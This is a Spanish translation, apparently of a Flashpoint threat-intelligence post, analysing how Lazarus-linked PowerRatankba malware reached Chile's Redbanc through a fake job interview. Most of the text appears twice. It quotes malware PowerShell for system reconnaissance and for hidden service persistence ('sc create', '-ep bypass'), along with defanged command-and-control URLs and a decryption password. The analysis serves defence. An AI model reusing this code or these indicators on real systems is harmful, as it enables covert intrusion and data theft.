Los analistas de Flashpoint creen que la intrusión recientemente revelada y sufrida en diciembre de 2018 por la red interbancaria chilena Redbanc involucró a PowerRatankba, un conjunto de herramientas de malware con vínculos con el grupo Lazarus vinculados a Corea del Norte. Redbanc confirmó que el malware se instaló en la red corporativa de la compañía sin activar la detección de antivirus, sin embargo, la amenaza se ha mitigado desde entonces y no afectó las operaciones, los servicios o la infraestructura de la compañía.
Esta intrusión representa el último ejemplo conocido de herramientas afiliadas a Lazarus que se implementan dentro de una actividad motivada financieramente dirigida a las instituciones financieras en América Latina.
De acuerdo con informes recientes, la intrusión se produjo debido a un malware enviado a través de un profesional de TI de Redbanc de confianza que hizo clic para solicitar un puesto de trabajo encontrado en las redes sociales. La persona que parecía haber publicado la posición abierta se comunicó con el solicitante de Redbanc para concertar una breve entrevista, que ocurrió poco después en español a través de Skype.
Nunca habiendo expresado ninguna duda sobre la legitimidad de la posición abierta, la solicitud o el proceso de entrevista, el solicitante fue engañado en última instancia e inconscientemente para ejecutar el malware.
LA MUESTRA REFERIDA LLEVA A LAZARUS
En las muestras de referencia pública atribuidas a la intrusión de Redbanc, los analistas de Flashpoint identificaron la muestra de dropper como relacionada con el malware Lazarus PowerRatankba. El dropper es un ejecutable compilado de Microsoft Visual C # / Basic .NET (v4.0.30319) que contiene la lógica para llamar al servidor y descargar una herramienta de reconocimiento PowerRatankba PowerShell. La marca de tiempo del malware muestra el posible tiempo de compilación del miércoles 31 de octubre de 2018, 00:07:53 UTC con la base de datos del programa como F: \ 05.GenereatePDF \ CardOffer \ salarial \ salarial \ obj \ Release \ ApplicationPDF.pdb.
El dropper muestra un formulario de solicitud de trabajo falso mientras se descarga y ejecuta PowerRatankba. El Payload no estaba disponible desde el servidor durante el tiempo del análisis, pero se recuperó de un sandbox en el momento del análisis. Esto permitió a los analistas crear un escenario probable de cómo funcionaba la cadena de malware.
Las funciones de malware responsables de la ejecución están contenidas en las funciones ThreadProc y SendUrl, procesan los parámetros codificados en Base64 y ejecutan el código PowerRatankba.
El dropper decodifica los parámetros codificados en Base64, llama al servidor en hxxps: // ecombox [.] Store / tbl_add [.] Php y ejecuta el código de PowerShell guardado en C: \\ users \\ public \\ REG_TIME.ps1 a través de Ventana oculta, durmiendo durante 5,000 milisegundos antes de eliminar el script guardado de PowerShell.
PowerRatankba
La cadena de malware aprovecha otro script de decodificador Powershell para recrear el código PowerRatankba de PowerShell mediante la función "crypt_do" que aprovecha Base64, Rijndael con SHA256. La contraseña pasada es "PowershellAgent".
Según los investigadores de Proofpoint, PowerRatankba es una herramienta más reciente de reconocimiento y descarga de implantes que utiliza Lazarus para obtener fingerprints y obtener información sobre máquinas comprometidas. La estructura de URI y el malware se parecen a la descrita como "PowerRatankba.B" por Proofpoint, ya que tienen el mismo algoritmo de cifrado DES entre otras similitudes de plantillas de código. Una diferencia para esta variante de PowerRatankba es que se comunica con el servidor en HTTPS. Notablemente, la plantilla de malware contiene el servidor base comentado hxxps: // bodyshoppechiropractic [.] com.
Las principales acciones que toma el malware son las siguientes:
El malware aprovecha el Instrumental de administración de Windows (WMI) para obtener la IP de la víctima mediante el análisis de Win32_NetworkAdapterConfiguration para la dirección IP y MAC. Es notable que para el ID de víctima, el malware aprovecha la dirección MAC con codificación Base64, que se pasa a la acción = "Qué" y se codifica una vez más a través del algoritmo Base64.
PowerRatankba consulta la información del sistema para obtener los siguientes detalles, utilizando WMI para Win32_NetworkAdapterConfiguration y Win32_OperatingSystem. Además, el malware recupera al usuario que inició sesión a través de $ env: USERNAME, la lista de procesos a través de la lista de tareas, obtiene la configuración del proxy a través de consultas de registro y comprueba si hay archivos compartidos abiertos (RPC 139, SMB 445) y Remote Desktop Protocol (RDP; 3389). ) puertos, escribiendo en un registro si está "Abierto" o "Cerrado o filtrado".
La colección completa de artículos se realiza a través del siguiente extracto de código:
El malware comprueba si tiene privilegios de administrador que solicitan el identificador de seguridad (SID) "S-1-5-32-544" y "Grupo habilitado" a través de whoami / groups, que es un grupo de administradores integrado.
Si tiene privilegios de administrador, PowerRatankba intenta descargar la siguiente etapa desde hxxps: // ecombox [.] Store / tbl_add [.] Php como "c: \ windows \ temp \ REG_WINDEF.ps1 y lo registra como un servicio a través de El comando "sc create" como "AutoProtect", con el comando "cmd.exe / powershell" que tiene el parámetro "inicio = Auto".
El código relevante es el siguiente:
MITIGACIONES Y RECOMENDACIONES
Los investigadores creen que Lázaro (también conocido como "Grupo de Lázaro", "Cobra Oculta" y "Kimsuky") es un grupo de APT que comprende operadores de "Bureau 121" (121 국), la división de guerra cibernética del RGB de Corea del Norte. El grupo ha estado activo al menos desde 2009 y se presume que opera en una multitud de ubicaciones internacionales. Lázaro parece haber estado interesado en una variedad de sectores y objetivos en los últimos dieciocho meses, pero sigue siendo uno de los grupos APT más formidables dirigidos y explotando instituciones financieras. Según se informa, el grupo ha estado involucrado en una serie de intrusiones bancarias que han impactado a instituciones de todo el mundo, dirigidas en gran medida a las instituciones financieras latinoamericanas y los intercambios de criptomonedas.
El monitoreo y la revisión de los incidentes relacionados con Lazarus y la disección de los ataques y los juegos de herramientas del grupo en el marco de ATT & CK pueden ayudar a mitigar la exposición a esta amenaza. Además, los ataques de Lazarus parecen depender de las redes sociales y las relaciones de confianza, que pueden elevar sus capacidades para ejecutar e instalar sus cargas útiles. Como tal, también se recomienda la capacitación en conciencia de seguridad, especialmente la relacionada con las redes sociales y la ingeniería social.
Fuente: https://www.flashpoint-intel.com/blog/disclosure-chilean-redbanc-intrusion-lazarus-ties/
Esta intrusión representa el último ejemplo conocido de herramientas afiliadas a Lazarus que se implementan dentro de una actividad motivada financieramente dirigida a las instituciones financieras en América Latina.
De acuerdo con informes recientes, la intrusión se produjo debido a un malware enviado a través de un profesional de TI de Redbanc de confianza que hizo clic para solicitar un puesto de trabajo encontrado en las redes sociales. La persona que parecía haber publicado la posición abierta se comunicó con el solicitante de Redbanc para concertar una breve entrevista, que ocurrió poco después en español a través de Skype.
Nunca habiendo expresado ninguna duda sobre la legitimidad de la posición abierta, la solicitud o el proceso de entrevista, el solicitante fue engañado en última instancia e inconscientemente para ejecutar el malware.
LA MUESTRA REFERIDA LLEVA A LAZARUS
En las muestras de referencia pública atribuidas a la intrusión de Redbanc, los analistas de Flashpoint identificaron la muestra de dropper como relacionada con el malware Lazarus PowerRatankba. El dropper es un ejecutable compilado de Microsoft Visual C # / Basic .NET (v4.0.30319) que contiene la lógica para llamar al servidor y descargar una herramienta de reconocimiento PowerRatankba PowerShell. La marca de tiempo del malware muestra el posible tiempo de compilación del miércoles 31 de octubre de 2018, 00:07:53 UTC con la base de datos del programa como F: \ 05.GenereatePDF \ CardOffer \ salarial \ salarial \ obj \ Release \ ApplicationPDF.pdb.
El dropper muestra un formulario de solicitud de trabajo falso mientras se descarga y ejecuta PowerRatankba. El Payload no estaba disponible desde el servidor durante el tiempo del análisis, pero se recuperó de un sandbox en el momento del análisis. Esto permitió a los analistas crear un escenario probable de cómo funcionaba la cadena de malware.
Las funciones de malware responsables de la ejecución están contenidas en las funciones ThreadProc y SendUrl, procesan los parámetros codificados en Base64 y ejecutan el código PowerRatankba.
El dropper decodifica los parámetros codificados en Base64, llama al servidor en hxxps: // ecombox [.] Store / tbl_add [.] Php y ejecuta el código de PowerShell guardado en C: \\ users \\ public \\ REG_TIME.ps1 a través de Ventana oculta, durmiendo durante 5,000 milisegundos antes de eliminar el script guardado de PowerShell.
PowerRatankba
La cadena de malware aprovecha otro script de decodificador Powershell para recrear el código PowerRatankba de PowerShell mediante la función "crypt_do" que aprovecha Base64, Rijndael con SHA256. La contraseña pasada es "PowershellAgent".
Según los investigadores de Proofpoint, PowerRatankba es una herramienta más reciente de reconocimiento y descarga de implantes que utiliza Lazarus para obtener fingerprints y obtener información sobre máquinas comprometidas. La estructura de URI y el malware se parecen a la descrita como "PowerRatankba.B" por Proofpoint, ya que tienen el mismo algoritmo de cifrado DES entre otras similitudes de plantillas de código. Una diferencia para esta variante de PowerRatankba es que se comunica con el servidor en HTTPS. Notablemente, la plantilla de malware contiene el servidor base comentado hxxps: // bodyshoppechiropractic [.] com.
Las principales acciones que toma el malware son las siguientes:
action="What" action="cmd" action="CmdRes" action="BaseInfo"
El malware aprovecha el Instrumental de administración de Windows (WMI) para obtener la IP de la víctima mediante el análisis de Win32_NetworkAdapterConfiguration para la dirección IP y MAC. Es notable que para el ID de víctima, el malware aprovecha la dirección MAC con codificación Base64, que se pasa a la acción = "Qué" y se codifica una vez más a través del algoritmo Base64.
PowerRatankba consulta la información del sistema para obtener los siguientes detalles, utilizando WMI para Win32_NetworkAdapterConfiguration y Win32_OperatingSystem. Además, el malware recupera al usuario que inició sesión a través de $ env: USERNAME, la lista de procesos a través de la lista de tareas, obtiene la configuración del proxy a través de consultas de registro y comprueba si hay archivos compartidos abiertos (RPC 139, SMB 445) y Remote Desktop Protocol (RDP; 3389). ) puertos, escribiendo en un registro si está "Abierto" o "Cerrado o filtrado".
La colección completa de artículos se realiza a través del siguiente extracto de código:
wmi = Get-WmiObject -Computer $private:computer -Class Win32_NetworkAdapterConfiguration
-ErrorAction SilentlyContinue IP
$loggedUser = $env:USERNAME
if ($private:wmi = Get-WmiObject -Computer $private:computer -Class Win32_OperatingSystem
-ErrorAction SilentlyContinue)
$data.'OS Architecture' = $private:wmi.OSArchitecture
$data.'OS Boot Time' = $private:wmi.ConvertToDateTime($private:wmi.LastBootUpTime)
$data.'OS Language ' = $private:wmi.OSLanguage
$data.'OS Version' = $private:wmi.Version
$data.'OS Name' = $private:wmi.Caption
$data.'OS Install Date' = $private:wmi.ConvertToDateTime($private:wmi.InstallDate)
$data.'OS Service Pack' = [string]$private:wmi.ServicePackMajorVersion
$private:wmi.ServicePackMinorVersion
$ports =
'File shares/RPC' = '139'
'File shares' = '445'
'RDP' = '3389'
$data."Port $($ports.$service) ($service)" = 'Open'
$private:socket.Close()
$data."Port $($ports.$service) ($service)" = 'Closed or filtered'
$private:socket = $null
$reg2 = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('CurrentUser', $env:COMPUTERNAME)
$regkey2 = $reg2.OpenSubkey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings")
$data.'ProxyEnable' = $regkey2.GetValue('ProxyEnable')
$data.'ProxySetting' = $regkey2.GetValue('ProxyServer')
$global:PROXY_ENABLE = $data.'ProxyEnable'
$global:PROXY_SERVER = $data.'ProxySetting'
$outp = "HOST:"
$comName
"USER:"
$loggedUser
$outp
= $data.GetEnumerator()
Sort-Object 'Name'
Format-Table -AutoSize
Out-String
$outp
$process_list
El malware comprueba si tiene privilegios de administrador que solicitan el identificador de seguridad (SID) "S-1-5-32-544" y "Grupo habilitado" a través de whoami / groups, que es un grupo de administradores integrado.
Si tiene privilegios de administrador, PowerRatankba intenta descargar la siguiente etapa desde hxxps: // ecombox [.] Store / tbl_add [.] Php como "c: \ windows \ temp \ REG_WINDEF.ps1 y lo registra como un servicio a través de El comando "sc create" como "AutoProtect", con el comando "cmd.exe / powershell" que tiene el parámetro "inicio = Auto".
El código relevante es el siguiente:
$ret = Test-Path -Path $schedulePath
$cmdSchedule = 'sc create '
$nr_task
' binPath= "cmd.exe /c powershell.exe -ep bypass -windowstyle hidden -file '
$schedulePath
'" start= Auto'
MITIGACIONES Y RECOMENDACIONES
Los investigadores creen que Lázaro (también conocido como "Grupo de Lázaro", "Cobra Oculta" y "Kimsuky") es un grupo de APT que comprende operadores de "Bureau 121" (121 국), la división de guerra cibernética del RGB de Corea del Norte. El grupo ha estado activo al menos desde 2009 y se presume que opera en una multitud de ubicaciones internacionales. Lázaro parece haber estado interesado en una variedad de sectores y objetivos en los últimos dieciocho meses, pero sigue siendo uno de los grupos APT más formidables dirigidos y explotando instituciones financieras. Según se informa, el grupo ha estado involucrado en una serie de intrusiones bancarias que han impactado a instituciones de todo el mundo, dirigidas en gran medida a las instituciones financieras latinoamericanas y los intercambios de criptomonedas.
El monitoreo y la revisión de los incidentes relacionados con Lazarus y la disección de los ataques y los juegos de herramientas del grupo en el marco de ATT & CK pueden ayudar a mitigar la exposición a esta amenaza. Además, los ataques de Lazarus parecen depender de las redes sociales y las relaciones de confianza, que pueden elevar sus capacidades para ejecutar e instalar sus cargas útiles. Como tal, también se recomienda la capacitación en conciencia de seguridad, especialmente la relacionada con las redes sociales y la ingeniería social.
Fuente: https://www.flashpoint-intel.com/blog/disclosure-chilean-redbanc-intrusion-lazarus-ties/
